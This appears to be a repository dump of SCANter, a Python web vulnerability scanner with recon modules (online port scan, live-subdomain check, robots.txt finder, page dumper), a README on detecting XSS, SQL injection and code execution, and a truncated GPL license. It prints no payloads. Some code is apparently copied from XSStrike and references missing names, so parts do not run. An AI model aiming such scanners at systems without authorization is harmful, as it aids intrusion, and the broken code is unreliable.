├── core ├── __init__.py ├── colors.pyc ├── __init__.pyc ├── reporter.py ├── scanner.pyc ├── requester.pyc ├── encoder.py ├── __pycache__ │ ├── log.cpython-37.pyc │ ├── utils.cpython-37.pyc │ ├── __init__.cpython-37.pyc │ ├── __init__.cpython-38.pyc │ ├── colors.cpython-37.pyc │ ├── colors.cpython-38.pyc │ ├── config.cpython-37.pyc │ ├── config.cpython-38.pyc │ ├── confing.cpython-37.pyc │ ├── encoder.cpython-37.pyc │ ├── encoder.cpython-38.pyc │ ├── logger.cpython-38.pyc │ ├── reporter.cpython-38.pyc │ ├── scanner.cpython-37.pyc │ ├── scanner.cpython-38.pyc │ ├── requester.cpython-37.pyc │ ├── requester.cpython-38.pyc │ └── wafDetector.cpython-37.pyc ├── config.py ├── logger.py ├── colors.py ├── updater.py ├── requester.py └── scanner.py ├── modules ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-38.pyc │ └── scant3r_maker.cpython-38.pyc ├── nmaper.py ├── httpre.py ├── robot.py ├── dumper.py └── scant3r_maker.py ├── requirements.txt ├── setup.py ├── README.md ├── LICENSE └── ICAscanner /core/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /modules/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | -------------------------------------------------------------------------------- /core/colors.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/colors.pyc -------------------------------------------------------------------------------- /core/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__init__.pyc -------------------------------------------------------------------------------- /core/reporter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def make_report(vuln): 4 | pass 5 | -------------------------------------------------------------------------------- /core/scanner.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/scanner.pyc -------------------------------------------------------------------------------- /core/requester.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/requester.pyc -------------------------------------------------------------------------------- /core/encoder.py: -------------------------------------------------------------------------------- 1 | import urllib.parse 2 | def urlencoder(payload): 3 | return urllib.parse.quote(payload,safe='') -------------------------------------------------------------------------------- /core/__pycache__/log.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/log.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/utils.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/utils.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/colors.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/colors.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/colors.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/colors.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/config.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/config.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/config.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/config.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/confing.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/confing.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/encoder.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/encoder.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/encoder.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/encoder.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/logger.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/logger.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/reporter.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/reporter.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/scanner.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/scanner.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/scanner.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/scanner.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/requester.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/requester.cpython-37.pyc -------------------------------------------------------------------------------- /core/__pycache__/requester.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/requester.cpython-38.pyc -------------------------------------------------------------------------------- /core/__pycache__/wafDetector.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/core/__pycache__/wafDetector.cpython-37.pyc -------------------------------------------------------------------------------- /modules/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/modules/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /modules/__pycache__/scant3r_maker.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/SCANter/HEAD/modules/__pycache__/scant3r_maker.cpython-38.pyc -------------------------------------------------------------------------------- /core/config.py: -------------------------------------------------------------------------------- 1 | #------------------------- 2 | # ScanT3r Config File .. | 3 | #------------------------- 4 | # HTTPS Cert 5 | vert = True 6 | # Allow Redirects 7 | redir=False 8 | -------------------------------------------------------------------------------- /core/logger.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import requests,urllib3 3 | from core.colors import * 4 | logging.basicConfig( 5 | format=f'{bold}[{cyan}%(asctime)s{end}{bold}]{gray}[{end}{bold}{green}%(levelname)s{gray}]{end} %(message)s',datefmt='%H:%M:%S') 6 | logger = logging.getLogger() 7 | logger.setLevel(logging.DEBUG) 8 | logging.getLogger("requests").setLevel(logging.WARNING) 9 | logging.getLogger("urllib3").setLevel(logging.WARNING) 10 | """ 11 | logger.info('SQLI not found') 12 | logger.debug('This a Debug Message') 13 | logger.warning('Im Sorry i can hack this system') 14 | logger.error('HTTP ERROR') 15 | logger.critical('Internet Down') 16 | """ -------------------------------------------------------------------------------- /modules/nmaper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from modules.scant3r_maker import Module,colors 3 | def data(): # The all data of module 4 | data = { 5 | 'name': 'port scanning', 6 | 'description':''' 7 | Make Port scanning processe using Hackertarget api 8 | With This module you can scan all hosts using NMAP Tool Online 9 | ''', 10 | 'date':'15-2-2020', 11 | 'license':'GPL', 12 | 'authors':[ 13 | 'Khaled Nassar'], 14 | 'emails':[ 15 | 'knassar702@gmail.com'], 16 | 'list_support': False, 17 | 'options':[ 18 | 'url' 19 | ] 20 | } 21 | return data 22 | class script: 23 | def __init__(self): 24 | pass 25 | def run(self,options): 26 | import requests 27 | r = requests.get('https://api.hackertarget.com/nmap/?q='+options['url'].split('/')[2]) 28 | print(r.text) 29 | -------------------------------------------------------------------------------- /core/colors.py: -------------------------------------------------------------------------------- 1 | __author__ = 'Err0r_HB' 2 | __version__ = '0.3#beta' 3 | __github__ = 'https://github.com/Err0r-ICA/SCANter' 4 | __email__ = 'error_hb@protonmail.com' 5 | __blog__ = 'https://t.me/termuxhacks' 6 | 7 | import sys 8 | import os 9 | import platform 10 | colors = True # Output should be colored 11 | machine = sys.platform # Detecting the os of current system 12 | checkplatform = platform.platform() # Get current version of OS 13 | if machine.lower().startswith(('os', 'win', 'darwin', 'ios')): 14 | colors = False # Colors shouldn't be displayed in mac & windows 15 | if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586: 16 | colors = True 17 | os.system('') # Enables the ANSI 18 | if not colors: 19 | end = red = white = green = yellow = run = bad = good = bold = info = que = '' 20 | else: 21 | white = '\033[97m' 22 | green = '\033[92m' 23 | red = '\033[91m' 24 | yellow = '\033[93m' 25 | end = '\033[0m' 26 | back = '\033[7;91m' 27 | bold = '\033[1m' 28 | blue = '\033[94m' 29 | info = '\033[93m[!]\033[0m' 30 | que = '\033[94m[?]\033[0m' 31 | bad = '\033[91m[-]\033[0m' 32 | good = '\033[92m[+]\033[0m' 33 | run = '\033[97m[~]\033[0m' 34 | grey = '\033[7;90m' 35 | cyan='\u001B[36m' 36 | gray = '\033[90m' 37 | -------------------------------------------------------------------------------- /modules/httpre.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from modules.scant3r_maker import Module,colors,thetime 3 | def data(): # The all data of module 4 | data = { 5 | 'name': 'httpre', 6 | 'description':''' 7 | Get a live subdomains 8 | ''', 9 | 'date':'3-3-2020', 10 | 'license':'GPL', 11 | 'authors':[ 12 | 'Khaled Nassar'], 13 | 'emails':[ 14 | 'knassar702@gmail.com'], 15 | 'list_support': True, 16 | 'options':[ 17 | 'url', 18 | 'threads', 19 | 'timeout' 20 | ] 21 | } 22 | return data 23 | class script: 24 | def __init__(self): 25 | global q 26 | from queue import Queue 27 | q = Queue() 28 | def threader(): 29 | item = q.get() 30 | script.opener(item) 31 | q.task_done() 32 | def opener(domain): 33 | import requests 34 | try: 35 | r = requests.get(f'http://{domain.strip()}',timeout=timeout,verify=False,allow_redirects=False) 36 | print(f'{colors().good} Live : {domain.strip()}') 37 | f = open(name,'a') 38 | f.write(f'\nhttp://{domain.strip()}') 39 | f.close() 40 | except: 41 | print(f'{colors().bad} {domain.strip()}') 42 | def run(self,options): 43 | global timeout,name 44 | import os 45 | name = f'{os.getcwd()}/scant3r_done_{thetime(t="yes").second}_{thetime(t="yes").minute}.txt' 46 | timeout = options['timeout'] 47 | from threading import Thread 48 | for thr in range(options['threads']): 49 | p1 = Thread(target=script.threader) 50 | p1.daemon = True 51 | p1.start() 52 | for url in options['file']: 53 | q.put(url.strip()) 54 | q.join() 55 | -------------------------------------------------------------------------------- /modules/robot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from modules.scant3r_maker import Module,colors,thetime 3 | def data(): # The all data of module 4 | data = { 5 | 'name': 'Robot Man', 6 | 'description':''' 7 | Find Robots File 8 | ''', 9 | 'date':'6-3-2020', 10 | 'license':'GPL', 11 | 'authors':[ 12 | 'Khaled Nassar'], 13 | 'emails':[ 14 | 'knassar702@gmail.com'], 15 | 'list_support': True, 16 | 'options':[ 17 | 'url', 18 | 'threads', 19 | 'timeout' 20 | ] 21 | } 22 | return data 23 | class script: 24 | def __init__(self): 25 | global q 26 | from queue import Queue 27 | q = Queue() 28 | def threader(): 29 | item = q.get() 30 | script.opener(item) 31 | q.task_done() 32 | def opener(domain): 33 | import requests 34 | try: 35 | if domain.strip().endswith('/'): 36 | ro = 'robots.txt' 37 | else: 38 | ro = '/robots.txt' 39 | r = requests.get(f'{domain.strip()}{ro}',timeout=timeout,verify=False,allow_redirects=False) 40 | if r.status_code == 200: 41 | print(f'{colors().good} Found : {r.url}') 42 | print(r.text) 43 | print('\n----------------------------\n') 44 | except: 45 | pass 46 | # print(f'{colors().bad} {domain.strip()}') 47 | def run(self,options): 48 | global timeout,name 49 | import os 50 | timeout = options['timeout'] 51 | from threading import Thread 52 | for thr in range(options['threads']): 53 | p1 = Thread(target=script.threader) 54 | p1.daemon = True 55 | p1.start() 56 | for url in options['file']: 57 | q.put(url.strip()) 58 | q.join() -------------------------------------------------------------------------------- /modules/dumper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from modules.scant3r_maker import Module,colors,thetime 3 | def data(): # The all data of module 4 | data = { 5 | 'name': 'Dumper', 6 | 'description':''' 7 | Dump Everything in website (img , links , js , etc ..) 8 | ''', 9 | 'date':'6-3-2020', 10 | 'license':'GPL', 11 | 'authors':[ 12 | 'Khaled Nassar'], 13 | 'emails':[ 14 | 'knassar702@gmail.com'], 15 | 'list_support': True, 16 | 'options':[ 17 | 'url', 18 | 'threads', 19 | 'timeout' 20 | ] 21 | } 22 | return data 23 | class script: 24 | def __init__(self): 25 | pass 26 | def run(self,options): 27 | import requests 28 | from bs4 import BeautifulSoup 29 | f = options['file'] 30 | for url in f: 31 | if url.startswith('http://') or url.startswith('https://'): 32 | pass 33 | else: 34 | url = f'http://{url}' 35 | print(f"{colors().info} [ {url.strip()} ]") 36 | base_url = url.strip() 37 | try: 38 | r = requests.get(base_url,verify=False,timeout=options['timeout']) 39 | soup = BeautifulSoup(r.text) 40 | l = { 41 | 'img':'src', 42 | 'script':'src', 43 | 'link':'href', 44 | 'a':'href', 45 | 'input':'name', 46 | } 47 | for tag,ty in l.items(): 48 | print(f'\n\n{colors().red}+={colors().yellow}------{base_url}--[{tag}]----------{colors().red}=+{colors().end}') 49 | for src in soup.find_all(tag): 50 | try: 51 | print(src[ty]) 52 | except: 53 | continue 54 | print(f'{colors().red}#{colors().yellow}----------------------{colors().red}#{colors().end}') 55 | except: 56 | pass 57 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | 3 | 4 | with open("README.md", "r") as f: 5 | long_description = f.read() 6 | setup( 7 | name="SCANter", 8 | version="0.3", 9 | description="Web Application Security Scanner", 10 | long_description=long_description, 11 | author="Italia Cyber Army", 12 | author_email="@termux_hacking", 13 | url="https://github.com/Err0r-ICA", 14 | download_url="https://github.com/Err0r-ICA/SCANter", 15 | packages=find_packages(), 16 | include_package_data=True, 17 | scripts=('scant3r',), 18 | entry_points={}, 19 | install_requires=[ 20 | "requests", 21 | ], 22 | extras_require={ 23 | "tests": [ 24 | "pytest", 25 | "pytest-forked", 26 | "pytest-xdist", 27 | "flake8", 28 | ], 29 | }, 30 | classifiers=[ 31 | "Operating System :: POSIX", 32 | "Environment :: Console", 33 | "Environment :: Console :: Curses", 34 | "License :: OSI Approved :: BSD License", 35 | "Programming Language :: Python", 36 | "Programming Language :: Python :: 3.7", 37 | "Intended Audience :: Developers", 38 | "Intended Audience :: Education", 39 | "Intended Audience :: Information Technology", 40 | "Intended Audience :: Science/Research", 41 | "Intended Audience :: System Administrators", 42 | "Intended Audience :: Telecommunications Industry", 43 | "Topic :: Security", 44 | "Topic :: System :: Web", 45 | "Topic :: Utilities", 46 | ], 47 | ) 48 | -------------------------------------------------------------------------------- /core/updater.py: -------------------------------------------------------------------------------- 1 | import os 2 | import re 3 | from requests import get 4 | 5 | from core.config import changes 6 | from core.colors import run, que, good, info, end, green 7 | from core.log import setup_logger 8 | 9 | logger = setup_logger(__name__) 10 | 11 | 12 | def updater(): 13 | logger.run('Checking for updates') 14 | latestCommit = get( 15 | 'https://raw.githubusercontent.com/s0md3v/XSStrike/master/core/config.py').text 16 | 17 | if changes not in latestCommit: # just a hack to see if a new version is available 18 | changelog = re.search(r"changes = '''(.*?)'''", latestCommit) 19 | changelog = changelog.group(1).split( 20 | ';') # splitting the changes to form a list 21 | logger.good('A new version of XSStrike is available.') 22 | changes_str = 'Changes:\n' 23 | for change in changelog: # prepare changes to print 24 | changes_str += '%s>%s %s\n' % (green, end, change) 25 | logger.info(changes_str) 26 | currentPath = os.getcwd().split('/') # if you know it, you know it 27 | folder = currentPath[-1] # current directory name 28 | path = '/'.join(currentPath) # current directory path 29 | choice = input('%s Would you like to update? [Y/n] ' % que).lower() 30 | 31 | if choice != 'n': 32 | logger.run('Updating XSStrike') 33 | os.system( 34 | 'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder)) 35 | os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' % 36 | (path, folder, path, path, folder)) 37 | logger.good('Update successful!') 38 | else: 39 | logger.good('XSStrike is up to date!') 40 | -------------------------------------------------------------------------------- /modules/scant3r_maker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # ScanT3r Web application Security Scanner - By : Err0r_HB @termux_hacking 4 | # This program is free software; you can redistribute it and/or modify 5 | # it under the terms of the GNU General Public License as published by 6 | # the Free Software Foundation; either version 2 of the License, or 7 | # (at your option) any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program; if not, write to the Free Software 16 | 17 | __author__ = 'Err0r_HB' 18 | __version__ = '0.3#beta' 19 | __github__ = 'https://github.com/Err0r-ICA/SCANter' 20 | __email__ = 'error_hb@protonmail.com' 21 | __blog__ = 'https://t.me/termuxhacks' 22 | 23 | import importlib 24 | import sys 25 | import os 26 | import platform 27 | from datetime import datetime 28 | class colors: 29 | def __init__(self): 30 | colors = True 31 | machine = sys.platform # Detecting the os of current system 32 | checkplatform = platform.platform() # Get current version of OS 33 | if machine.lower().startswith(('os', 'win', 'darwin', 'ios')): 34 | colors = False # Colors shouldn't be displayed in mac & windows 35 | if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586: 36 | colors = True 37 | os.system('') # Enables the ANSI 38 | if not colors: 39 | end = red = white = green = yellow = run = bad = good = bold = info = que = '' 40 | else: 41 | self.white = '\033[97m' 42 | self.green = '\033[92m' 43 | self.red = '\033[91m' 44 | self.yellow = '\033[93m' 45 | self.end = '\033[0m' 46 | self.back = '\033[7;91m' 47 | self.bold = '\033[1m' 48 | self.blue = '\033[94m' 49 | self.info = '\033[93m[!]\033[0m' 50 | self.que = '\033[94m[?]\033[0m' 51 | self.bad = '\033[91m[-]\033[0m' 52 | self.good = '\033[92m[+]\033[0m' 53 | self.run = '\033[97m[~]\033[0m' 54 | self.grey = '\033[7;90m' 55 | def thetime(t=None): 56 | now = datetime.now() 57 | if t: 58 | return now 59 | return f'{colors().bold}{colors().blue}[{colors().end}{colors().bold}{now.hour}:{now.minute}:{now.second}{colors().blue}{colors().bold}]{colors().end}' 60 | class Module: 61 | def __init__(): 62 | pass 63 | def printer(what,msg): 64 | if what.lower() == 'information': 65 | print(thetime()+f' {colors().bold}[{colors().green}INFO{colors().end}] {msg}{colors().end}') 66 | elif what.lower() == 'error': 67 | print(thetime()+f' {colors().bold}[\033[91m{colors().bold}CRITICAL{colors().end}] {colors().bold}{msg}{colors().end}') 68 | elif what.lower() == 'warring': 69 | print(thetime()+f' {colors().bold}[{colors().yellow}{colors().bold}WARRING{colors().end}] {colors().bold}{msg}{colors().end}') 70 | elif what.lower() == 'question': 71 | p = input(msg) 72 | if p[0].lower() == 'y' or p[0] == '': 73 | pass 74 | else: 75 | exit() 76 | def load_modules(module): 77 | Module.printer('info',f'Loading {module} Module') 78 | module = 'modules.'+module.replace('.py','').replace('/','.') 79 | c = importlib.import_module(module) 80 | return c 81 | -------------------------------------------------------------------------------- /core/requester.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # This program is free software; you can redistribute it and/or modify 3 | # it under the terms of the GNU General Public License as published by 4 | # the Free Software Foundation; either version 2 of the License, or 5 | # (at your option) any later version. 6 | # 7 | # This program is distributed in the hope that it will be useful, 8 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | # GNU General Public License for more details. 11 | # 12 | # You should have received a copy of the GNU General Public License 13 | # along with this program; if not, write to the Free Software 14 | 15 | __author__ = 'Err0r_HB' 16 | __version__ = '0.3#beta' 17 | __github__ = 'https://github.com/Err0r-ICA/SCANter' 18 | __email__ = 'error_hb@protonmail.com' 19 | __blog__ = 'https://t.me/termuxhacks' 20 | 21 | from datetime import datetime 22 | from .colors import * 23 | from .config import * 24 | from .logger import logger 25 | from .scanner import uagent 26 | from time import sleep 27 | import requests,urllib3 28 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 29 | def thetime(): 30 | now = datetime.now() 31 | return f'{bold}{blue}[{end}{bold}{now.hour}:{now.minute}:{now.second}{blue}{bold}]{end}' 32 | def red(w): 33 | if w == 'ag': 34 | return True 35 | else: 36 | return False 37 | def con(url,redir,cookie=None,timeo=None,vert=None,proxy=None,slp=0,cagent=None): 38 | try: 39 | if slp != 0: 40 | logger.debug(f'Sleeping {slp} sec') 41 | sleep(slp) 42 | logger.info(f'Check The URL') 43 | r = requests.get(url,allow_redirects=redir,timeout=timeo,cookies=cookie,verify=vert,proxies=proxy,headers={'User-agent':uagent(cagent=cagent)}) 44 | if r.status_code == 200: 45 | logger.info(f'http response : {r.status_code}') 46 | elif r.status_code == 302 or r.status_code == 301: 47 | logger.info(f"http response : {r.status_code} That's mean Redirect to another page/website") 48 | elif r.status_code == 999: 49 | logger.info('KingWaf Firwill Has been detected') 50 | sleep(1) 51 | else: 52 | logger.info(f'http response : {r.status_code}') 53 | except requests.exceptions.ConnectionError: 54 | logger.error(f"host '{blue}{url}{end}' does not exist ..!") 55 | exit() 56 | except requests.exceptions.ReadTimeout: 57 | logger.error(f"\n{bad} Timeout Error ") 58 | exit() 59 | except requests.exceptions.ProxyError: 60 | logger.error(f"{bad} Proxy Connection Error") 61 | exit() 62 | except requests.exceptions.InvalidURL: 63 | logger.error(f"{bad} Invalid URL") 64 | exit() 65 | except requests.exceptions.InvalidSchema: 66 | logger.error(f"{bad} Invalid Schame") 67 | exit() 68 | except requests.exceptions.MissingSchema: 69 | logger.error(f"{bad} Missing Schema") 70 | exit() 71 | def con_f(url,redir,cookie=None,timeo=None,vert=None,proxy=None,cagent=None,slp=0): 72 | try: 73 | sleep(slp) 74 | r = requests.get(url,allow_redirects=redir,timeout=timeo,verify=vert,cookies=cookie,proxies=proxy,headers={'User-agent':uagent(cagent=cagent)}) 75 | return 'ok' 76 | except requests.exceptions.ReadTimeout: 77 | return 'no','\ntimeout error ..' 78 | except requests.exceptions.ConnectionError: 79 | return 'no','Connection Error ..' 80 | except requests.exceptions.ProxyError: 81 | return 'no','Proxy Connection Error' 82 | except requests.exceptions.InvalidURL: 83 | return 'no','Invalid URL' 84 | except requests.exceptions.InvalidSchema: 85 | return 'no','Invalid Schema' 86 | except requests.exceptions.MissingSchema: 87 | return 'no','Missing Schema' 88 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SCANter - Web Security Scanner 🔎 2 | 3 | ## 📒 Description 📒 4 | 5 | * ##### Detect This vulnerabilities 6 | *
Remote Code Execution
7 | 8 | *
XSS Reflected
9 | *
Template Injection
10 | 17 | *
SQl Injection
18 | 19 | ## 📸 Screenshot 📸 20 | ![Screenshot](https://i.postimg.cc/4ZSdm0Vm/IMG-20200427-162813-866.jpg) 21 | 22 | 23 | ## OS Support 24 | 25 | -
Kali Linux
26 | -
Android - Termux
27 | -
Windows
28 | 29 | ## 💿 Installation 💿 30 | ### [Linux](https://wikipedia.org/wiki/Linux) [![alt tag](http://icons.iconarchive.com/icons/dakirby309/simply-styled/32/OS-Linux-icon.png)](https://fr.wikipedia.org/wiki/Linux) 31 | * open your terminal 32 | * enter this command 33 | ```` 34 | $ git clone https://github.com/Err0r-ICA/SCANter 35 | $ cd SCANter 36 | $ python3 -m pip install -r requirements.txt 37 | ```` 38 | ### Android 39 | * Download Termux App 40 | * open termux app 41 | * enter this command 42 | ````bash 43 | $ pkg install python -y 44 | $ pkg install git -y 45 | $ git clone https://github.com/Err0r-ICA/SCANter 46 | $ cd SCANter 47 | $ python3 -m pip install -r requirements.txt 48 | ```` 49 | ### Windows 50 | * Download python3 and install it 51 | * open your cmd 52 | * enter this command 53 | ```` 54 | $ python3 -m pip install -r requirements.txt 55 | ```` 56 | 57 | ## 🧾 Usage 🧾 58 | ```` 59 | Options: 60 | -h, --help | Show help message and exit 61 | --version | Show program's version number and exit 62 | -u URL, --url=URL | Target URL (e.g."http://www.target.com/vuln.php?id=1") 63 | --data=DATA | Data string to be sent through POST (e.g. "id=1") 64 | --list=FILE | Get All Urls from List 65 | --threads | Max number of concurrent HTTP(s) requests (default 10) 66 | --timeout | Seconds to wait before timeout connection 67 | --proxy | Start The Connection with http(s) proxy 68 | --cookies | HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..") 69 | --encode | How Many encode the payload (default 1) 70 | --allow-redirect | Allow the main redirect 71 | --verify | Skip HTTPS Cert Error 72 | --user-agent | add custom user-agent 73 | --scan-headers | Try to inject payloads in headers not parameters (user-agent,referrer) 74 | --skip-headers | Skip The Headers scanning processe 75 | --sleep | Sent one request after some Seconds 76 | --batch | Never ask for user input, use the default behavior 77 | --module | add custom module (e.g. "google.py") 78 | 79 | ```` 80 | ### ☠️ Input Example ☠️ 81 | 82 | ``` $ python3 ICAscanner -u 'http://localhost/dvwa/vulnerabilities/exec/' --data='ip=localhost&Submit=Submit' --cookies='PHPSESSID=safasf' ``` 83 | 84 | [![Build-passing](https://img.shields.io/badge/build-passing-red.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![Stars](https://img.shields.io/open-vsx/stars/Redhat/Java.svg?style=plastic&color=orange)](https://github.com/Err0r-ICA/SpeedTest/issues) [![Coverage](https://img.shields.io/azure-devops/coverage/Swellaby/Opensource/25?color=yellow&style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 85 | 86 | [![Maintainers](https://img.shields.io/badge/mainteiners-HackBoyz-green.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![coded](https://img.shields.io/badge/coded%20in-python2.7-mintgreen.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 87 | 88 | [![Status](https://img.shields.io/badge/code%20status-encrypted-cyan.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![License](https://img.shields.io/badge/license-MIT-blueviolet.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 89 | 90 | [![Test](https://img.shields.io/badge/tested%20on-Termux,%20Kali%20Linux,%20Ubuntu,%20Parrot%20OS,%20Debian,%20ANDRAX%20Mobile-%23ff69b4.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 91 | 92 | ### My Accounts 93 | 94 | codeSTACKr | Instagram 95 | codeSTACKr | TikTok 96 | codeSTACKr | Telegram
97 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened 